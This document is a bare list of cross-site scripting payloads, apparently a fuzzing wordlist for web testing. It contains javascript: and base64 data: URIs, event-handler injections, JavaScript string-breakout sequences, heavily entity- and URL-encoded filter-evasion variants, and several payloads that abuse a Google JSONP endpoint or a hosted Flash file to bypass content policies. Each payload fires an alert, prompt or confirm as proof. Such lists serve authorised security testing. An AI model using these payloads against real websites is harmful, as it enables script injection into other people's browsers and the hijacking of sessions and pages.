a = document.createElament("a"); a.href = "javascript:alert()"; a.protocol

javascript://:%0aalert()
javascript:alert(1)

<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=
0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg" HTTP-EQUIV="refresh" a="a

<script>a=top[Object.keys(top).filter((v)=>{if(/^do/.test(v))return 1})];for(i in a)if(/ie$/.test(i))alert(a[i])</script>
<</>script></script></script/<script>alert`1`<</script>/script><script

"-alert(1)//
'-alert(1)//
"-alert(1)-"
'-alert(1)-'
";alert(1);"
';alert(1);'
";-alert(1);"
';-alert(1);'
";-alert(1);-"
';-alert(1);-'
\\";-alert(1);"
\\';-alert(1);'
";-alert(1);"//
';-alert(1);'//
\";alert(1);//
\';alert(1);//
\\";alert(1);//
\\';alert(1);// 
\";-alert(1);//
\';-alert(1);//
\\";-alert(1);//
\\';-alert(1);//
\";alert(1);//
\';alert(1);//
\";-alert(1);//
\';-alert(1);//
\";alert(1)//
\';alert(1)//
alert(1)
";alert(1); var foo="
';alert(1); var foo='
";}alert(1);function x(){//
';}alert(1);function x(){//
";}alert(1);-function x(){//
';}alert(1);-function x(){//
\"})))}catch(e){alert(1)}//
'}alert(1);{'
'}alert(1)%0A{'
\'}alert(1);{//

<svg><p><style><a id="</style><img src=1 onerror=alert(1)>"></p></svg>
<xmp><p title="</xmp><script>alert(0)</script>">
<iframe %26%2309;%26%2310;%26%2311; src="javascript%26%2358;alert(1)"%26%2311;%26%2310;%26%2309;;>
\x3Ctextarea+onauxclick\x3Dconfirm(1)\x3Eright+click+here

<svg><animate xlink:href=#xss attributeName=href dur=5s repeatCount=indefinite keytimes=0;0;1 values="https://portswigger.net?&semi;javascript:alert(1)&semi;0" /><a id=xss><text x=20 y=20>XSS</text></a>

<jAvAsC onclick=location=tagName%2BinnerHTML%2Blocation.hash>rIpT:/*click me!#*/alert(13337)
<jAvAsC onclick=location=tagName%2BinnerHTML%2BURL>rIpT%26colon;#%0Aalert(13337)

<iframe name=windowplz></iframe><script>windowplz.alert(1)</script>
testtest"/accesskey%3D"%26%2388;"/onclick%3D"%26%2391;1%5D.find%26lpar;alert%29
["<s ", " onmouseover='alert(1)'>", "foobar</s>"]
</script><svg><script>alert(1)%0A-->
<style>*{transition:color 1s}*:hover{color:red}</style><brute ontransitionend=confirm(1)>
<svg/on<script><script>load=alert(1)//</script>
<svg><set id=alert onbegin=top[id](1)>
<svg><script>/<@/>alert(1)</script>
<img src onerror=%26emsp;prompt`${document.domain}`>
<svg </onload ="1> (_=prompt,_(1)) "">
{` <body \< onload =1(_=prompt,_(String.fromCharCode(88,83,83,32,66,121,32,77,111,114,112,104,105,110,101)))> �}
</ScRiPt><img src=something onauxclick="new Function `al\ert\`xss\``">
<img src=x:alert(alt) onerror=eval(src) alt=document.domain>
<--`<img/src=` onerror=confirm``> --!>
<details/open/ontoggle="self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']['ale'%2b'rt'];throw/**/self['doc'%2b'ument']['domain'];">
"><iframe/onload=ajavascript%26colon;alert%26lpar;document%26period;domain%26rpar;>
<a+HREF='%26%237javascrip%26%239t:alert%26lpar;document.domain)'>t
<a href="j%26Tab;a%26Tab;v%26Tab;asc%26NewLine;ri%26Tab;pt%26colon;%26lpar;a%26Tab;l%26Tab;e%26Tab;r%26Tab;t%26Tab;(document.domain)%26rpar;">X</a>
<!'/*!"/*\'/*\"/**/-top[`con\x66irm`]`1`//><svg>
">'><details/open/ontoggle=confirm(1)>
<object data=javascript:alert(1)>
<iframe srcdoc=<svg/o%26%23x6Eload%26equals;alert%26lpar;1)%26gt;>
'"</Script><Html /Onmouseover=(alert)(1) //
<svg><animate onend=alert(1) attributeName=x dur=1s>
<script>location='javascript:alert\x281\x29'</script>
<iframe srcdoc="<img src=1 onerror=alert(1)>"></iframe>
<img src="a" onerror='eval(atob("cHJvbXB0KDEpOw=="))'>

<form action="javascript%26%2358;alert%26%2340;1%26%2341;><input type=submit>
<form action=javascript:alert(1)><input type=submit value=XSS>

<math><brute href=javascript:alert(1)>click
<math><brute xlink:href=javascript:alert(1)>click
<svg><script xlink:href=data:,alert(1) />
<form><input formaction=javascript:alert(1) type=submit value=click>
<svg><animate onend=alert(1) attributeName=x dur=1s>
<svg><a xlink:href="javascript:alert(1)"><text x="20" y="20">XSS</text></a>

">'><details/open/ontoggle=confirm(1)>
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4="></object>
-->"'/></sCript><deTailS open x%3D">" ontoggle%3Da%3Dco\u006efirm,b%3D1,[1].find(a)>
<svg </onload ="1> (_=prompt,_(1)) "">
<img src='"><'" onclick=alert`1`>
<img/src='>'<**/onclick=alert`1`//*>*/>
<script>x = '<!--<script>'</script>/-alert(1)</script>

<x contenteditable onblur=alert(1)>lose focus!
<x onclick=alert(1)>click this!
<x oncopy=alert(1)>copy this!
<x oncontextmenu=alert(1)>right click this!
<x oncut=alert(1)>copy this!
<x ondblclick=alert(1)>double click this!
<x ondrag=alert(1)>drag this!
<x contenteditable onfocus=alert(1)>focus this!
<x contenteditable oninput=alert(1)>input here!
<x contenteditable onkeydown=alert(1)>press any key!
<x contenteditable onkeypress=alert(1)>press any key!
<x contenteditable onkeyup=alert(1)>press any key!
<x onmousedown=alert(1)>click this!
<x onmousemove=alert(1)>hover this!
<x onmouseout=alert(1)>hover this!
<x onmouseover=alert(1)>hover this!
<x onmouseup=alert(1)>click this!
<x contenteditable onpaste=alert(1)>paste here!

<</div>script</div>>alert()<</div>/script</div>>
<</img>script</img>>alert()<</img>/script</img>>

<script/src=//google.com/complete/search?client=chrome%26jsonp=alert(1);>

<a aaaa aa a aaa href%3D"%26%2301jav%0Das%26%2399;ript%26colon;alert%26lpar;1%26%2341;">
'><a aaaa aa a aaa href%3D"%26%2301jav%0Das%26%2399;ript%26colon;alert%26lpar;1%26%2341;">
"><a aaaa aa a aaa href%3D"%26%2301jav%0Das%26%2399;ript%26colon;alert%26lpar;1%26%2341;">
'/><a aaaa aa a aaa href%3D"%26%2301jav%0Das%26%2399;ript%26colon;alert%26lpar;1%26%2341;">
"/><a aaaa aa a aaa href%3D"%26%2301jav%0Das%26%2399;ript%26colon;alert%26lpar;1%26%2341;">
</ScRiPt/<K><a aaaa aa a aaa href%3D"%26%2301jav%0Das%26%2399;ript%26colon;alert%26lpar;1%26%2341;">
</TiTlE/<K><a aaaa aa a aaa href%3D"%26%2301jav%0Das%26%2399;ript%26colon;alert%26lpar;1%26%2341;">
</TeXtArEa/<K><a aaaa aa a aaa href%3D"%26%2301jav%0Das%26%2399;ript%26colon;alert%26lpar;1%26%2341;">
</StYlE/<K><a aaaa aa a aaa href%3D"%26%2301jav%0Das%26%2399;ript%26colon;alert%26lpar;1%26%2341;">
</NoScRiPt/<K><a aaaa aa a aaa href%3D"%26%2301jav%0Das%26%2399;ript%26colon;alert%26lpar;1%26%2341;">

<iframe src=%22javascript%26colon;alert%26lpar;1%26%2341;%%0D3C!--
'><iframe src=%22javascript%26colon;alert%26lpar;1%26%2341;%%0D3C!--
"><iframe src=%22javascript%26colon;alert%26lpar;1%26%2341;%%0D3C!--
'/><iframe src=%22java%0Dscript%26colon;alert%26lpar;1%26%2341;%%0D3C!--
"/><iframe src=%22javascript%26colon;alert%26lpar;1%26%2341;%%0D3C!--
</ScRiPt/<K><iframe src=%22javascript%26colon;alert%26lpar;1%26%2341;%%0D3C!--
</TiTlE/<K><iframe src=%22javascript%26colon;alert%26lpar;1%26%2341;%%0D3C!--
</TeXtArEa/<K><iframe src=%22javascript%26colon;alert%26lpar;1%26%2341;%%0D3C!--
</StYlE/<K><iframe src=%22javascript%26colon;alert%26lpar;1%26%2341;%%0D3C!--
</NoScRiPt/<K><iframe src=%22javascript%26colon;alert%26lpar;1%26%2341;%%0D3C!--

<body onpageshow%3Djavascript%26colon;alert%26lpar;1%26%2341;>
'><body onpageshow%3Djavascript%26colon;alert%26lpar;1%26%2341;>
"><body onpageshow%3Djavascript%26colon;alert%26lpar;1%26%2341;>
'/><body onpageshow%3Djavascript%26colon;alert%26lpar;1%26%2341;>
"/><body onpageshow%3Djavascript%26colon;alert%26lpar;1%26%2341;>
</ScRiPt/<K><body onpageshow%3Djavascript%26colon;alert%26lpar;1%26%2341;>
</TiTlE/<K><body onpageshow%3Djavascript%26colon;alert%26lpar;1%26%2341;>
</TeXtArEa/<K><body onpageshow%3Djavascript%26colon;alert%26lpar;1%26%2341;>
</StYlE/<K><body onpageshow%3Djavascript%26colon;alert%26lpar;1%26%2341;>
</NoScRiPt/<K><body onpageshow%3Djavascript%26colon;alert%26lpar;1%26%2341;>

<link href%3Djavascript%26colon;alert%26lpar;1%26%2341; accesskey%3Dx>
'><link href%3Djavascript%26colon;alert%26lpar;1%26%2341; accesskey%3Dx>
"><link href%3Djavascript%26colon;alert%26lpar;1%26%2341; accesskey%3Dx>
'/><link href%3Djavascript%26colon;alert%26lpar;1%26%2341; accesskey%3Dx>
"/><link href%3Djavascript%26colon;alert%26lpar;1%26%2341; accesskey%3Dx>
</ScRiPt/<K><link href%3Djavascript%26colon;alert%26lpar;1%26%2341; accesskey%3Dx>
</TiTlE/<K><link href%3Djavascript%26colon;alert%26lpar;1%26%2341; accesskey%3Dx>
</TeXtArEa/<K><link href%3Djavascript%26colon;alert%26lpar;1%26%2341; accesskey%3Dx>
</StYlE/<K><link href%3Djavascript%26colon;alert%26lpar;1%26%2341; accesskey%3Dx>
</NoScRiPt/<K><link href%3Djavascript%26colon;alert%26lpar;1%26%2341; accesskey%3Dx>

<embed src%3Djavascript%26colon;alert%26lpar;1%26%2341;>
'><embed src%3Djavascript%26colon;alert%26lpar;1%26%2341;>
"><embed src%3Djavascript%26colon;alert%26lpar;1%26%2341;>
'/><embed src%3Djavascript%26colon;alert%26lpar;1%26%2341;>
"/><embed src%3Djavascript%26colon;alert%26lpar;1%26%2341;>
</ScRiPt/<K><embed src%3Djavascript%26colon;alert%26lpar;1%26%2341;>
</TiTlE/<K><embed src%3Djavascript%26colon;alert%26lpar;1%26%2341;>
</TeXtArEa/<K><embed src%3Djavascript%26colon;alert%26lpar;1%26%2341;>
</StYlE/<K><embed src%3Djavascript%26colon;alert%26lpar;1%26%2341;>
</NoScRiPt/<K><embed src%3Djavascript%26colon;alert%26lpar;1%26%2341;>

<iframe xmlns%3Dhttp://www.w3.org/1999/xhtml src%3Djavascript%26colon;alert%26lpar;1%26%2341;>
'><iframe xmlns%3Dhttp://www.w3.org/1999/xhtml src%3Djavascript%26colon;alert%26lpar;1%26%2341;>
"><iframe xmlns%3Dhttp://www.w3.org/1999/xhtml src%3Djavascript%26colon;alert%26lpar;1%26%2341;>
'/><iframe xmlns%3Dhttp://www.w3.org/1999/xhtml src%3Djavascript%26colon;alert%26lpar;1%26%2341;>
"/><iframe xmlns%3Dhttp://www.w3.org/1999/xhtml src%3Djavascript%26colon;alert%26lpar;1%26%2341;>
</ScRiPt/<K><iframe xmlns%3Dhttp://www.w3.org/1999/xhtml src%3Djavascript%26colon;alert%26lpar;1%26%2341;>
</TiTlE/<K><iframe xmlns%3Dhttp://www.w3.org/1999/xhtml src%3Djavascript%26colon;alert%26lpar;1%26%2341;>
</TeXtArEa/<K><iframe xmlns%3Dhttp://www.w3.org/1999/xhtml src%3Djavascript%26colon;alert%26lpar;1%26%2341;>
</StYlE/<K><iframe xmlns%3Dhttp://www.w3.org/1999/xhtml src%3Djavascript%26colon;alert%26lpar;1%26%2341;>
</NoScRiPt/<K><iframe xmlns%3Dhttp://www.w3.org/1999/xhtml src%3Djavascript%26colon;alert%26lpar;1%26%2341;>

<object data%3Djavascript%26colon;alert%26lpar;1%26%2341;>

'><object data%3Djavascript%26colon;alert%26lpar;1%26%2341;>

"><object data%3Djavascript%26colon;alert%26lpar;1%26%2341;>


'/><object data%3Djavascript%26colon;alert%26lpar;1%26%2341;>


"/><object data%3Djavascript%26colon;alert%26lpar;1%26%2341;>

</ScRiPt/<K><object data%3Djavascript%26colon;alert%26lpar;1%26%2341;>

</TiTlE/<K><object data%3Djavascript%26colon;alert%26lpar;1%26%2341;>

</TeXtArEa/<K><object data%3Djavascript%26colon;alert%26lpar;1%26%2341;>

</StYlE/<K><object data%3Djavascript%26colon;alert%26lpar;1%26%2341;>

</NoScRiPt/<K><object data%3Djavascript%26colon;alert%26lpar;1%26%2341;>


<j oNcLiCk%3Dloc%26%2397;tion%3Dinne%26%23114;HTML>javascript:alert(1)#
'><j oNcLiCk%3Dloc%26%2397;tion%3Dinne%26%23114;HTML>javascript:alert(1)#
"><j oNcLiCk%3Dloc%26%2397;tion%3Dinne%26%23114;HTML>javascript:alert(1)#
'/><j oNcLiCk%3Dloc%26%2397;tion%3Dinne%26%23114;HTML>javascript:alert(1)#
"/><j oNcLiCk%3Dloc%26%2397;tion%3Dinne%26%23114;HTML>javascript:alert(1)#
</ScRiPt/<K><j oNcLiCk%3Dloc%26%2397;tion%3Dinne%26%23114;HTML>javascript:alert(1)#
</TiTlE/<K><j oNcLiCk%3Dloc%26%2397;tion%3Dinne%26%23114;HTML>javascript:alert(1)#
</TeXtArEa/<K><j oNcLiCk%3Dloc%26%2397;tion%3Dinne%26%23114;HTML>javascript:alert(1)#
</StYlE/<K><j oNcLiCk%3Dloc%26%2397;tion%3Dinne%26%23114;HTML>javascript:alert(1)#
</NoScRiPt/<K><j oNcLiCk%3Dloc%26%2397;tion%3Dinne%26%23114;HTML>javascript:alert(1)#

<SvG OnLoAd%3Dloc%26%2397;tion%3D/ja%26%23118;as/.sou%26%23114;ce%2B/c%26%23114;ipt:/.sou%26%23114;ce%2B/ale/.sou%26%23114;ce%2B/rt/.sou%26%23114;ce%2Bloc%26%2397;tion.h%26%2397;sh%26%2391;1%5D%2B1%2Bloc%26%2397;tion.h%26%2397;sh%26%2391;2%5D>#()
'><SvG OnLoAd%3Dloc%26%2397;tion%3D/ja%26%23118;as/.sou%26%23114;ce%2B/c%26%23114;ipt:/.sou%26%23114;ce%2B/ale/.sou%26%23114;ce%2B/rt/.sou%26%23114;ce%2Bloc%26%2397;tion.h%26%2397;sh%26%2391;1%5D%2B1%2Bloc%26%2397;tion.h%26%2397;sh%26%2391;2%5D>#()
"><SvG OnLoAd%3Dloc%26%2397;tion%3D/ja%26%23118;as/.sou%26%23114;ce%2B/c%26%23114;ipt:/.sou%26%23114;ce%2B/ale/.sou%26%23114;ce%2B/rt/.sou%26%23114;ce%2Bloc%26%2397;tion.h%26%2397;sh%26%2391;1%5D%2B1%2Bloc%26%2397;tion.h%26%2397;sh%26%2391;2%5D>#()
'/><SvG OnLoAd%3Dloc%26%2397;tion%3D/ja%26%23118;as/.sou%26%23114;ce%2B/c%26%23114;ipt:/.sou%26%23114;ce%2B/ale/.sou%26%23114;ce%2B/rt/.sou%26%23114;ce%2Bloc%26%2397;tion.h%26%2397;sh%26%2391;1%5D%2B1%2Bloc%26%2397;tion.h%26%2397;sh%26%2391;2%5D>#()
"/><SvG OnLoAd%3Dloc%26%2397;tion%3D/ja%26%23118;as/.sou%26%23114;ce%2B/c%26%23114;ipt:/.sou%26%23114;ce%2B/ale/.sou%26%23114;ce%2B/rt/.sou%26%23114;ce%2Bloc%26%2397;tion.h%26%2397;sh%26%2391;1%5D%2B1%2Bloc%26%2397;tion.h%26%2397;sh%26%2391;2%5D>#()
</ScRiPt/<K><SvG OnLoAd%3Dloc%26%2397;tion%3D/ja%26%23118;as/.sou%26%23114;ce%2B/c%26%23114;ipt:/.sou%26%23114;ce%2B/ale/.sou%26%23114;ce%2B/rt/.sou%26%23114;ce%2Bloc%26%2397;tion.h%26%2397;sh%26%2391;1%5D%2B1%2Bloc%26%2397;tion.h%26%2397;sh%26%2391;2%5D>#()
</TiTlE/<K><SvG OnLoAd%3Dloc%26%2397;tion%3D/ja%26%23118;as/.sou%26%23114;ce%2B/c%26%23114;ipt:/.sou%26%23114;ce%2B/ale/.sou%26%23114;ce%2B/rt/.sou%26%23114;ce%2Bloc%26%2397;tion.h%26%2397;sh%26%2391;1%5D%2B1%2Bloc%26%2397;tion.h%26%2397;sh%26%2391;2%5D>#()
</TeXtArEa/<K><SvG OnLoAd%3Dloc%26%2397;tion%3D/ja%26%23118;as/.sou%26%23114;ce%2B/c%26%23114;ipt:/.sou%26%23114;ce%2B/ale/.sou%26%23114;ce%2B/rt/.sou%26%23114;ce%2Bloc%26%2397;tion.h%26%2397;sh%26%2391;1%5D%2B1%2Bloc%26%2397;tion.h%26%2397;sh%26%2391;2%5D>#()
</StYlE/<K><SvG OnLoAd%3Dloc%26%2397;tion%3D/ja%26%23118;as/.sou%26%23114;ce%2B/c%26%23114;ipt:/.sou%26%23114;ce%2B/ale/.sou%26%23114;ce%2B/rt/.sou%26%23114;ce%2Bloc%26%2397;tion.h%26%2397;sh%26%2391;1%5D%2B1%2Bloc%26%2397;tion.h%26%2397;sh%26%2391;2%5D>#()
</NoScRiPt/<K><SvG OnLoAd%3Dloc%26%2397;tion%3D/ja%26%23118;as/.sou%26%23114;ce%2B/c%26%23114;ipt:/.sou%26%23114;ce%2B/ale/.sou%26%23114;ce%2B/rt/.sou%26%23114;ce%2Bloc%26%2397;tion.h%26%2397;sh%26%2391;1%5D%2B1%2Bloc%26%2397;tion.h%26%2397;sh%26%2391;2%5D>#()

<svg onload%3Dlocation=loc%26%2397;tion.h%26%2397;sh.subst%26%23114;%26lpar;1%29>#javascript:alert(1)
'><svg onload%3Dlocation=loc%26%2397;tion.h%26%2397;sh.subst%26%23114;%26lpar;1%29>#javascript:alert(1)
"><svg onload%3Dlocation=loc%26%2397;tion.h%26%2397;sh.subst%26%23114;%26lpar;1%29>#javascript:alert(1)
'/><svg onload%3Dlocation=loc%26%2397;tion.h%26%2397;sh.subst%26%23114;%26lpar;1%29>#javascript:alert(1)
"/><svg onload%3Dlocation=loc%26%2397;tion.h%26%2397;sh.subst%26%23114;%26lpar;1%29>#javascript:alert(1)
</ScRiPt/<K><svg onload%3Dlocation=loc%26%2397;tion.h%26%2397;sh.subst%26%23114;%26lpar;1%29>#javascript:alert(1)
</TiTlE/<K><svg onload%3Dlocation=loc%26%2397;tion.h%26%2397;sh.subst%26%23114;%26lpar;1%29>#javascript:alert(1)
</TeXtArEa/<K><svg onload%3Dlocation=loc%26%2397;tion.h%26%2397;sh.subst%26%23114;%26lpar;1%29>#javascript:alert(1)
</StYlE/<K><svg onload%3Dlocation=loc%26%2397;tion.h%26%2397;sh.subst%26%23114;%26lpar;1%29>#javascript:alert(1)
</NoScRiPt/<K><svg onload%3Dlocation=loc%26%2397;tion.h%26%2397;sh.subst%26%23114;%26lpar;1%29>#javascript:alert(1)

<SvG OnLoAd%3D%26%2391;1%26%2393;.find%26lpar;al\u0%26%2348;65rt%29;>
'><SvG OnLoAd%3D%26%2391;1%26%2393;.find%26lpar;al\u0%26%2348;65rt%29;>
"><SvG OnLoAd%3D%26%2391;1%26%2393;.find%26lpar;al\u0%26%2348;65rt%29;>
'/><SvG OnLoAd%3D%26%2391;1%26%2393;.find%26lpar;al\u0%26%2348;65rt%29;>
"/><SvG OnLoAd%3D%26%2391;1%26%2393;.find%26lpar;al\u0%26%2348;65rt%29;>
</ScRiPt/<K><SvG OnLoAd%3D%26%2391;1%26%2393;.find%26lpar;al\u0%26%2348;65rt%29;>
</TiTlE/<K><SvG OnLoAd%3D%26%2391;1%26%2393;.find%26lpar;al\u0%26%2348;65rt%29;>
</TeXtArEa/<K><SvG OnLoAd%3D%26%2391;1%26%2393;.find%26lpar;al\u0%26%2348;65rt%29;>
</StYlE/<K><SvG OnLoAd%3D%26%2391;1%26%2393;.find%26lpar;al\u0%26%2348;65rt%29;>
</NoScRiPt/<K><SvG OnLoAd%3D%26%2391;1%26%2393;.find%26lpar;al\u0%26%2348;65rt%29;>

<A hReF%3Dj%26%2365;v%26%2365;s%26%2399rIpT%26colon;[1].find%26lpar;al\u0%26%2348;65rt%29;>X
'><A hReF%3Dj%26%2365;v%26%2365;s%26%2399rIpT%26colon;[1].find%26lpar;al\u0%26%2348;65rt%29;>X
"><A hReF%3Dj%26%2365;v%26%2365;s%26%2399rIpT%26colon;[1].find%26lpar;al\u0%26%2348;65rt%29;>X
'/><A hReF%3Dj%26%2365;v%26%2365;s%26%2399rIpT%26colon;[1].find%26lpar;al\u0%26%2348;65rt%29;>X
"/><A hReF%3Dj%26%2365;v%26%2365;s%26%2399rIpT%26colon;[1].find%26lpar;al\u0%26%2348;65rt%29;>X
</ScRiPt/<K><A hReF%3Dj%26%2365;v%26%2365;s%26%2399rIpT%26colon;[1].find%26lpar;al\u0%26%2348;65rt%29;>X
</TiTlE/<K><A hReF%3Dj%26%2365;v%26%2365;s%26%2399rIpT%26colon;[1].find%26lpar;al\u0%26%2348;65rt%29;>X
</TeXtArEa/<K><A hReF%3Dj%26%2365;v%26%2365;s%26%2399rIpT%26colon;[1].find%26lpar;al\u0%26%2348;65rt%29;>X
</StYlE/<K><A hReF%3Dj%26%2365;v%26%2365;s%26%2399rIpT%26colon;[1].find%26lpar;al\u0%26%2348;65rt%29;>X
</NoScRiPt/<K><A hReF%3Dj%26%2365;v%26%2365;s%26%2399rIpT%26colon;[1].find%26lpar;al\u0%26%2348;65rt%29;>X

<oUtPuT nAmE%3D"jA%26%23118;AsCriPt%26colon;//%26NewLine;\u0061ler%26%23116(1)" oNcLiCk%3D"ev%26%2397;l%26lpar;n%26%2397;me%29";>X</oUtPuT>
'><oUtPuT nAmE%3D"jA%26%23118;AsCriPt%26colon;//%26NewLine;\u0061ler%26%23116(1)" oNcLiCk%3D"ev%26%2397;l%26lpar;n%26%2397;me%29";>X</oUtPuT>
"><oUtPuT nAmE%3D"jA%26%23118;AsCriPt%26colon;//%26NewLine;\u0061ler%26%23116(1)" oNcLiCk%3D"ev%26%2397;l%26lpar;n%26%2397;me%29";>X</oUtPuT>
'/><oUtPuT nAmE%3D"jA%26%23118;AsCriPt%26colon;//%26NewLine;\u0061ler%26%23116(1)" oNcLiCk%3D"ev%26%2397;l%26lpar;n%26%2397;me%29";>X</oUtPuT>
"/><oUtPuT nAmE%3D"jA%26%23118;AsCriPt%26colon;//%26NewLine;\u0061ler%26%23116(1)" oNcLiCk%3D"ev%26%2397;l%26lpar;n%26%2397;me%29";>X</oUtPuT>
</ScRiPt/<K><oUtPuT nAmE%3D"jA%26%23118;AsCriPt%26colon;//%26NewLine;\u0061ler%26%23116(1)" oNcLiCk%3D"ev%26%2397;l%26lpar;n%26%2397;me%29";>X</oUtPuT>
</TiTlE/<K><oUtPuT nAmE%3D"jA%26%23118;AsCriPt%26colon;//%26NewLine;\u0061ler%26%23116(1)" oNcLiCk%3D"ev%26%2397;l%26lpar;n%26%2397;me%29";>X</oUtPuT>
</TeXtArEa/<K><oUtPuT nAmE%3D"jA%26%23118;AsCriPt%26colon;//%26NewLine;\u0061ler%26%23116(1)" oNcLiCk%3D"ev%26%2397;l%26lpar;n%26%2397;me%29";>X</oUtPuT>
</StYlE/<K><oUtPuT nAmE%3D"jA%26%23118;AsCriPt%26colon;//%26NewLine;\u0061ler%26%23116(1)" oNcLiCk%3D"ev%26%2397;l%26lpar;n%26%2397;me%29";>X</oUtPuT>
</NoScRiPt/<K><oUtPuT nAmE%3D"jA%26%23118;AsCriPt%26colon;//%26NewLine;\u0061ler%26%23116(1)" oNcLiCk%3D"ev%26%2397;l%26lpar;n%26%2397;me%29";>X</oUtPuT>

<vIdEo </onloadeddata%3D"1> (_%3Dalert,_('1'))"" controls><source src%3D"https://www.w3schools.com/html/mov_bbb.mp4"></vIdEo>
'><vIdEo </onloadeddata%3D"1> (_%3Dalert,_('1'))"" controls><source src%3D"https://www.w3schools.com/html/mov_bbb.mp4"></vIdEo>
"><vIdEo </onloadeddata%3D"1> (_%3Dalert,_('1'))"" controls><source src%3D"https://www.w3schools.com/html/mov_bbb.mp4"></vIdEo>
'/><vIdEo </onloadeddata%3D"1> (_%3Dalert,_('1'))"" controls><source src%3D"https://www.w3schools.com/html/mov_bbb.mp4"></vIdEo>
"/><vIdEo </onloadeddata%3D"1> (_%3Dalert,_('1'))"" controls><source src%3D"https://www.w3schools.com/html/mov_bbb.mp4"></vIdEo>
</ScRiPt/<K><vIdEo </onloadeddata%3D"1> (_%3Dalert,_('1'))"" controls><source src%3D"https://www.w3schools.com/html/mov_bbb.mp4"></vIdEo>
</TiTlE/<K><vIdEo </onloadeddata%3D"1> (_%3Dalert,_('1'))"" controls><source src%3D"https://www.w3schools.com/html/mov_bbb.mp4"></vIdEo>
</TeXtArEa/<K><vIdEo </onloadeddata%3D"1> (_%3Dalert,_('1'))"" controls><source src%3D"https://www.w3schools.com/html/mov_bbb.mp4"></vIdEo>
</StYlE/<K><vIdEo </onloadeddata%3D"1> (_%3Dalert,_('1'))"" controls><source src%3D"https://www.w3schools.com/html/mov_bbb.mp4"></vIdEo>
</NoScRiPt/<K><vIdEo </onloadeddata%3D"1> (_%3Dalert,_('1'))"" controls><source src%3D"https://www.w3schools.com/html/mov_bbb.mp4"></vIdEo>

<embed src%3D'//ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/charts.swf?allowedDomain%3D\"})))}catch(e){alert(1337)}//' allowscriptaccess%3Dalways>
'><embed src%3D'//ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/charts.swf?allowedDomain%3D\"})))}catch(e){alert(1337)}//' allowscriptaccess%3Dalways>
"><embed src%3D'//ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/charts.swf?allowedDomain%3D\"})))}catch(e){alert(1337)}//' allowscriptaccess%3Dalways>
'/><embed src%3D'//ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/charts.swf?allowedDomain%3D\"})))}catch(e){alert(1337)}//' allowscriptaccess%3Dalways>
"/><embed src%3D'//ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/charts.swf?allowedDomain%3D\"})))}catch(e){alert(1337)}//' allowscriptaccess%3Dalways>
</ScRiPt/<K><embed src%3D'//ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/charts.swf?allowedDomain%3D\"})))}catch(e){alert(1337)}//' allowscriptaccess%3Dalways>
</TiTlE/<K><embed src%3D'//ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/charts.swf?allowedDomain%3D\"})))}catch(e){alert(1337)}//' allowscriptaccess%3Dalways>
</TeXtArEa/<K><embed src%3D'//ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/charts.swf?allowedDomain%3D\"})))}catch(e){alert(1337)}//' allowscriptaccess%3Dalways>
</StYlE/<K><embed src%3D'//ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/charts.swf?allowedDomain%3D\"})))}catch(e){alert(1337)}//' allowscriptaccess%3Dalways>
</NoScRiPt/<K><embed src%3D'//ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/charts.swf?allowedDomain%3D\"})))}catch(e){alert(1337)}//' allowscriptaccess%3Dalways>

<jAvAsCrIpT:/*%0AoNcLiCk%3Dlo%26%2399;at%26%23105;on%3Dtag%26%2378;ame%2BinnerHTML%2Blocation%26%2346;hash>/*click me!#*/alert(1)
'><jAvAsCrIpT:/*%0AoNcLiCk%3Dlo%26%2399;at%26%23105;on%3Dtag%26%2378;ame%2BinnerHTML%2Blocation%26%2346;hash>/*click me!#*/alert(1)
"><jAvAsCrIpT:/*%0AoNcLiCk%3Dlo%26%2399;at%26%23105;on%3Dtag%26%2378;ame%2BinnerHTML%2Blocation%26%2346;hash>/*click me!#*/alert(1)
'/><jAvAsCrIpT:/*%0AoNcLiCk%3Dlo%26%2399;at%26%23105;on%3Dtag%26%2378;ame%2BinnerHTML%2Blocation%26%2346;hash>/*click me!#*/alert(1)
"/><jAvAsCrIpT:/*%0AoNcLiCk%3Dlo%26%2399;at%26%23105;on%3Dtag%26%2378;ame%2BinnerHTML%2Blocation%26%2346;hash>/*click me!#*/alert(1)
</ScRiPt/<K><jAvAsCrIpT:/*%0AoNcLiCk%3Dlo%26%2399;at%26%23105;on%3Dtag%26%2378;ame%2BinnerHTML%2Blocation%26%2346;hash>/*click me!#*/alert(1)
</TiTlE/<K><jAvAsCrIpT:/*%0AoNcLiCk%3Dlo%26%2399;at%26%23105;on%3Dtag%26%2378;ame%2BinnerHTML%2Blocation%26%2346;hash>/*click me!#*/alert(1)
</TeXtArEa/<K><jAvAsCrIpT:/*%0AoNcLiCk%3Dlo%26%2399;at%26%23105;on%3Dtag%26%2378;ame%2BinnerHTML%2Blocation%26%2346;hash>/*click me!#*/alert(1)
</StYlE/<K><jAvAsCrIpT:/*%0AoNcLiCk%3Dlo%26%2399;at%26%23105;on%3Dtag%26%2378;ame%2BinnerHTML%2Blocation%26%2346;hash>/*click me!#*/alert(1)
</NoScRiPt/<K><jAvAsCrIpT:/*%0AoNcLiCk%3Dlo%26%2399;at%26%23105;on%3Dtag%26%2378;ame%2BinnerHTML%2Blocation%26%2346;hash>/*click me!#*/alert(1)


'>
">
'/>
"/>
</ScRiPt/<K>
</TiTlE/<K>
</TeXtArEa/<K>
</StYlE/<K>
</NoScRiPt/<K>